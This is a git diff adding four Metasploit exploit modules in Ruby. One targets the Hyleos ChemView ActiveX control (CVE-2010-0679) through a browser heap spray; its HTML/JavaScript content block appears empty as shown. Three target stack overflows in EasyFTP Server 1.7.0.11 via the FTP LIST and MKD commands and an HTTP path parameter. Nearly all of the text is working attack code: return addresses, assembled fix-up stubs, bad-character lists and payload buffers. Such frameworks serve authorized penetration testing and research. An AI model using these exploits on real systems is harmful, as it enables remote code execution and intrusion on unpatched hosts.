diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb new file mode 100644 index 0000000000..57bdf9381d --- /dev/null +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -0,0 +1,139 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking # heap spray :-/ + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos + ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods + with an overly long first argument, an attacker can overrun a buffer and execute + arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Paul Craig ', # original discovery/advisory + 'Dz_attacker ', # original file format module + 'jduck' # converted HttpServer module + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2010-0679' ], + [ 'OSVDB', '62276' ], + [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ], + [ 'URL', 'http://www.exploit-db.com/exploits/11422/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ] + ], + 'DisclosureDate' => 'Feb 10 2010', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + + clsid = "C372350A-1D5A-44DC-A759-767FC553D96C" + progid = "HyleosChemView.HLChemView" + + methods = [ "ReadMolFile", "SaveAsMolFile" ] + method = methods[rand(methods.length)] + method = "SaveAsMolFile" + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # It may be possible to create a more robust exploit, however -- + # 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000) + # 2. The buffer overflow does not appear to be entirely straight forward. + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + ret = Rex::Text.uri_encode([target.ret].pack('L')) + blocksize = 0x40000 + fillto = 300 + offset = target['Offset'] + + # Randomize the javascript variable names + chemview = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_ret = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + + content = %Q| + + +| + + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb new file mode 100644 index 0000000000..9476bd2963 --- /dev/null +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -0,0 +1,127 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# EDB-ID: 14400 +# Date : July 5, 2010 +# Discovered by : Karn Ganeshen +# Version : 1.7.0.11 +# Tested on : Windows XP SP3 Version 2002 +# MFR & VAS TEAM : just testing howto convert exploits to metasploit modules. +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. + credit goes to Karn Ganeshan. + + NOTE: Although, this is likely to exploit the same vulnerability as the + 'easyftp_cwd_fixret' exploit, it uses a slightly different vector. + }, + 'Author' => + [ + 'Karn Ganeshan ', # original version + 'MFR', # convert to metasploit format. + 'jduck' # modified to use fix-up stub (works with bigger payloads) + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '62134' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14400/' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14451/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x0a\x0d\x2f\x5c", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 - Version 2002', { 'Ret' => 0x7e49732b } ], # call edi from user32.dll (v5.1.2600.5512) + ], + 'DisclosureDate' => 'July 5 2010', + 'DefaultTarget' => 0)) + end + + def check + connect + disconnect + + if (banner =~ /BigFoolCat/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + connect_login + + # NOTE: + # This exploit jumps to edi, which happens to point at a partial version of + # the 'buf' string in memory. The fixRet below fixes up the code stored on the + # stack and then jumps there to execute the payload. The value in esp is used + # with an offset for the fixup. + fixRet_asm = %q{ + mov edi,esp + mov [edi], 0xfeedfed5 + add edi, 0xfffffff4 + mov byte ptr [edi], 0xc0 + add edi,4 + mov [edi], 0xdeadbeef + add edi, 0xffffff24 + add esp, 0xfffffe04 + jmp edi + } + fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string + + buf = '' + + print_status("Prepending fixRet...") + buf << fixRet + buf << make_nops(0x30 - buf.length) + + print_status("Adding the payload...") + buf << payload.encoded + + # Patch the original stack data into the fixer stub + buf[4, 4] = buf[268 + 8, 4] + buf[16, 1] = buf[268-4, 1] + buf[22, 4] = buf[268, 4] + + print_status("Overwriting part of the payload with target address...") + buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes + + print_status("Sending exploit buffer...") + send_cmd( ['LIST', buf] , false) + + handler + disconnect + end + +end diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb new file mode 100644 index 0000000000..ac74b7b584 --- /dev/null +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -0,0 +1,129 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 + and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which + leads to a stack based buffer overflow. + + NOTE: EasyFTP allows anonymous access by default. However, in order to access the + 'MKD' command, you must have access to an account that can create directories. + + After version 1.7.0.12, this package was renamed "UplusFtp". + + This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. + This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by + 'fixing' the return address post-exploitation. See references for more information. + }, + 'Author' => + [ + 'x90c', # original version + 'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads) + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '62134' ], + [ 'URL', 'http://www.exploit-db.com/exploits/12044/' ], + [ 'URL', 'http://www.exploit-db.com/exploits/14399/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x0a\x0d\x2f\x5c", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe + [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe + ], + 'DisclosureDate' => 'Apr 04 2010', + 'DefaultTarget' => 0)) + end + + def check + connect + disconnect + + if (banner =~ /BigFoolCat/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def make_nops(num); "C" * num; end + + def exploit + connect_login + + # NOTE: + # This exploit jumps to ebp, which happens to point at a partial version of + # the 'buf' string in memory. The fixRet below fixes up the code stored on the + # stack and then jumps there to execute the payload. The value in esp is used + # with an offset for the fixup. + fixRet_asm = %q{ + mov edi,esp + sub edi, 0xfffffe10 + mov [edi], 0xfeedfed5 + add edi, 0xffffff14 + jmp edi + } + fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string + + buf = '' + + print_status("Prepending fixRet...") + buf << fixRet + buf << make_nops(0x20 - buf.length) + + print_status("Adding the payload...") + buf << payload.encoded + + # Patch the original stack data into the fixer stub + buf[10, 4] = buf[268, 4] + + print_status("Overwriting part of the payload with target address...") + buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes + + print_status("Sending exploit buffer...") + send_cmd( ['MKD', buf] , false) + + handler + disconnect + end + +end diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb new file mode 100644 index 0000000000..e13e78db49 --- /dev/null +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -0,0 +1,127 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 + and earlier. EasyFTP fails to check input size when parsing the 'path' parameter + supplied to an HTTP GET request, which leads to a stack based buffer overflow. + EasyFTP allows anonymous access by default; valid credentials are typically + unnecessary to exploit this vulnerability. + + After version 1.7.0.12, this package was renamed "UplusFtp". + + Due to limited space, as well as difficulties using an egghunter, the use of + staged, ORD, and/or shell payloads is recommended. + }, + 'Author' => + [ + 'ThE g0bL!N', # Original exploit [see References] + 'jduck' # Metasploit re-implementation + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://www.exploit-db.com/exploits/11500/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 256, + 'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP3 - Easy FTP Server Universal', + # NOTE: It's not possible to use addresses within the + # binary due to the nul byte. + { + 'Ret' => 0x7cc5d507 # jmp esp in shell32.dll + #'Ret' => 0xdeadbeef + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 18 2010' + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + ], self.class) + end + + def check + info = http_fingerprint # check method + if info and (info =~ /Easy-Web Server\//) + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe + end + + + def exploit + if (payload.encoded.length > payload_space) + raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload." + end + + # Fix up ESP, jmp to the beginning of the buffer + stub_asm = %q{ + mov edi, esp + add esp, 0xfffffc04 + add edi, 0xfffffee8 + jmp edi + } + stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string + + # Build the path up + path = '' + path << payload.encoded + path << rand_text(268 - path.length) + # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect. + path << [target.ret].pack('V') + path << rand_text(280 - path.length) + path << stub + path << rand_text(332 - path.length) + + uri = "/list.html?path=" + uri << path + + print_status("Trying target #{target.name}...") + res = send_request_raw({ 'uri' => uri }, 5) + + if (res) + print_error("The server unexpectedly responded, this is not good.") + print_status(res.inspect) + end + + handler + end + +end